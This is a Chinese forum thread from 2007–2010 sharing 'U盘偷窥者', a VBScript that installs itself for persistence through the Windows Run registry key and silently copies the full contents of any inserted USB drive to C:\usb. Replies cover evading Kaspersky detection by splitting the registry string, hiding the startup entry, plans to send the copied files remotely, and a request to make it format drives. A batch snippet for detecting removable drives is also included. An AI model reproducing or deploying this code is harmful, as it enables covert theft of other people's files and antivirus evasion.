标题: [原创]U盘偷窥者,监视U盘一插入就COPY [打印本页]

---

作者: zhoushijay     时间: 2007-5-14 09:43    标题: [原创]U盘偷窥者,监视U盘一插入就COPY

请把代码中U盘的盘符(H:\)改成自己电脑U盘的盘符
代码已经过证实会被卡吧认为是病毒, -__-!


'---------------------------------U盘偷窥者.vbs-------------------------------------
set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next
ws.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\USBgetter","C:\Program Files\U盘偷窥者.vbs"
if fso.folderexists("c:\usb")=false then
fso.createfolder("c:\usb")
fso.copyfile "U盘偷窥者.vbs","C:\Program Files\"
end if
do
wscript.sleep 1000
if fso.driveexists("H:\") then
fso.copyfile "H:\*","c:\usb\"
fso.copyfolder "H:\*","c:\usb\"
wscript.sleep 20000
end if
loop
'-------------------------------------------------------------------------------------

---

作者: zhoushijay     时间: 2007-5-14 09:52
经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉

---

作者: baomaboy     时间: 2007-5-14 09:55
没通用性，要改成自动检测U盘。

---

作者: baomaboy     时间: 2007-5-14 09:57

Quote:

Originally posted by zhoushijay at 2007-5-14 09:52: 经过进一步的测试,卡吧认为是病毒的原因是因为它修改了注册表的启动项,测试的时候可以把修改注册表那一段去掉

连自启动也取消，那还叫U盘偷窥者吗，什么都要自己改。

---

作者: zhoushijay     时间: 2007-5-14 09:57
宝马兄有什么办法可以自动检测盘符吗?

不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了

---

作者: baomaboy     时间: 2007-5-14 10:09
把它的马甲改成背心穿，至少我的卡巴已经认不出这是原来那个毒了，不知道你用的什么杀毒软件，有效果吗？

---

作者: baomaboy     时间: 2007-5-14 10:11

Quote:

Originally posted by zhoushijay at 2007-5-14 09:57: 宝马兄有什么办法可以自动检测盘符吗? 不过这个暂时没必要,等研究出了如何远程传送文件到自己电脑之后就需要这个了

好像在论坛看到过资料，你自己搜一下

---

作者: zhoushijay     时间: 2007-5-14 10:14
厉害咯,我的卡吧也认不出来了,这么笨的!

---

作者: bob1989     时间: 2007-5-14 13:56
加在注册表里很容易被人发现的``还是加到开始的启动里把！

---

作者: zhoushijay     时间: 2007-5-14 17:46
很多人都误会了,其实这个程序装在你电脑上,你是使用者,在你电脑上使用U盘的人才是受害者,这点必须搞清楚,既然你是使用者,你当然知道这个程序装在哪里,所以不存在发现不发现的问题.

---

作者: ebfok     时间: 2007-5-14 19:20
好是好，就是进程中多了个Wscript，7M多呢，不知道vbs有没有更好的常驻内存的办法

---

作者: zhoushijay     时间: 2007-5-14 19:51
我这只有2M啊,一点都不影响,这是目前我在用的修改后的代码


set fso=createobject("scripting.filesystemobject")
set ws=createobject("wscript.shell")
on error resume next

if fso.folderexists("c:\usb")=false then
   aaa="HKEY_CURRENT_USER\Software\Micr"
   bbb="osoft\Windows\Curr"
   ccc="entVers"
   ddd="ion\Ru"
   eee="n\USBgetter"
   ws.regwrite aaa&bbb&ccc&ddd&eee,"C:\WINDOWS\system32\usbgeter.vbs"
   fso.createfolder("c:\usb")
   fso.copyfile "usbgeter.vbs","C:\WINDOWS\system32\"
end if

do
  wscript.sleep 1000
  if fso.driveexists("H:\") then
     fso.copyfile "H:\*","c:\usb\"
     fso.copyfolder "H:\*","c:\usb\"
     wscript.sleep 20000
  end if
loop

---

作者: qq82015930     时间: 2007-10-9 16:11
记号

---

作者: pooloo     时间: 2007-10-10 08:17
恩，学习中……我也给一段：
echo 正在检测可移动设备
setlocal enabledelayedexpansion
for /f "skip=1 tokens=1,2 delims=\" %%i in ('fsutil fsinfo drives^|find /v ""') do (
    set drv_lst=%%i
    set drv_lst=!drv_lst:~-2!
    for %%udisk in (!drv_lst!) do (
        fsutil fsinfo drivetype %%udisk | findstr "移动" >nul 2>nul && if /i not "%%udisk"=="A:" (
            set drive=%%udisk
            echo U盘盘符是%%udisk  。
            echo 显示U盘隐藏文件……
            !drive!
            cd\
            attrib /s/d -r -h -s -a *.* >nul 2>nul
        )
    )
)
cls
echo 检测完毕！没有检测到U盘存在！请手工输入U盘盘符
pause

[ Last edited by pooloo on 2007-10-10 at 08:22 AM ]

---

作者: buddiyar     时间: 2010-2-20 21:34
做个记号 呵呵
谢谢

---

作者: Michale     时间: 2010-2-22 14:15
晕 我这边测试了 竟然没反应

---

作者: zsbjxy     时间: 2010-2-22 17:45
怎么才能变成格式化U盘？

---

作者: zsbjxy     时间: 2010-5-9 00:17
学习中

---

作者: yonghu111     时间: 2010-5-10 13:24
学习了！！！

---

作者: 422904z     时间: 2010-5-12 21:50
拜谢